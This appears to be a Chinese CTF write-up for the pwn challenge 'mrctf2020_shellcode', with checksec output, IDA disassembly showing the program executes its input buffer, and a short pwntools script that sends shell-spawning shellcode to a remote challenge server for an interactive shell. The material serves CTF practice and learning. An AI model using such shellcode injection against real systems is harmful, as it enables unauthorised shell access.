加载头像

mrctf2020_shellcode

Ubuntu16.04


checksec

1
2
3
4
5
6
7
[*] '/home/zelas/Desktop/pwn/mrctf2020_shellcode/mrctf2020_shellcode'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: No canary found
NX: NX disabled
PIE: PIE enabled //
RWX: Has RWX segments

IDA

main()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
; Attributes: bp-based frame

; int __cdecl main(int argc, const char **argv, const char **envp)
public main
main proc near

buf= byte ptr -410h
var_4= dword ptr -4

; __unwind {
push rbp
mov rbp, rsp
sub rsp, 410h
mov rax, cs:stdin@@GLIBC_2_2_5
mov esi, 0 ; buf
mov rdi, rax ; stream
call _setbuf
mov rax, cs:stdout@@GLIBC_2_2_5
mov esi, 0 ; buf
mov rdi, rax ; stream
call _setbuf
mov rax, cs:stderr@@GLIBC_2_2_5
mov esi, 0 ; buf
mov rdi, rax ; stream
call _setbuf
lea rdi, s ; "Show me your magic!"
call _puts
lea rax, [rbp+buf]
mov edx, 400h ; nbytes
mov rsi, rax ; buf
mov edi, 0 ; fd
mov eax, 0
call _read
mov [rbp+var_4], eax
cmp [rbp+var_4], 0
jg short loc_11D6

loc11D6

1
2
3
4
loc_11D6:
lea rax, [rbp+buf]
call rax
mov eax, 0

0x02


思路

输入字符[buf],长度大于0,则执行buf

0x03


exp

1
2
3
4
5
6
7
8
9
10
from pwn import *

context(log_level='debug', os='linux', arch='amd64')
io = remote('node4.buuoj.cn', 28388)
# io = process(['./mrctf2020_shellcode'])

shellcode = asm(shellcraft.sh())
io.sendline(shellcode)
io.interactive()


评论
✅ 你无需删除空行,直接评论以获取最佳展示效果
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體